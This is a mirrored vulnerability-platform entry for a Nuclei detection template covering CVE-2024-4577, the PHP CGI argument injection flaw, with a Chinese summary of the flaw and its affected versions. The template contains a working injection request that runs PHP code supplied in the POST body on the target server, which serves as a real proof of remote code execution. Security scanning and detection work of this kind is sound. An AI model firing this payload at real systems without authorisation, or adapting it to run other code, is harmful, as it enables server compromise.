漏洞平台

POC详情： 74101abec4f4b6bd4bf5483c2dae150f22ec18a2

来源

https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template

关联漏洞

标题： PHP 操作系统命令注入漏洞 (CVE-2024-4577)
描述：PHP是一种在服务器端执行的脚本语言。 PHP存在操作系统命令注入漏洞，该漏洞源于在特定条件下，Windows系统使用“Best-Fit”行为替换命令行中的字符，这可能导致PHP CGI模块错误地将这些字符解释为PHP选项，从而泄露脚本的源代码，在服务器上运行任意PHP代码等。以下版本受到影响：8.1至8.1.29之前版本，8.3至8.3.8之前版本，8.2至8.2.20之前版本。

介绍

# CVE-2024-4577 Nuclei Template

This repository contains a Nuclei template to detect the PHP CGI Argument Injection vulnerability identified as CVE-2024-4577.

## Template Details

```yaml
id: CVE-2024-4577

info:
  name: CVE-2024-4577 PHP CGI Argument Injection
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
    This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
  tags: cve,cve2024,php,cgi,rce,cve2024-4577

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      
    headers:
      User-Agent: "curl/8.3.0"
      Accept: "*/*"
      Content-Type: "application/x-www-form-urlencoded"
      Connection: "keep-alive"
    body: |
      <?php echo md5("CVE_2024_4577_TEST"); ?>
    matchers:
      - type: word
        part: body
        words:
          - "83946a388fdf6cd2707eed8550575a76"

```

## Usage

To use this template with Nuclei, save the template content into a file named `CVE-2024-4577.yaml` and run the following command:

```bash
nuclei -t CVE-2024-4577.yaml -u <target-url>
```
Replace `<target-url>` with the URL of the target you want to scan.

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)

文件快照


 [4.0K]  /data/pocs/74101abec4f4b6bd4bf5483c2dae150f22ec18a2
├── [1.3K]  CVE-2024-4577.yaml
└── [1.9K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。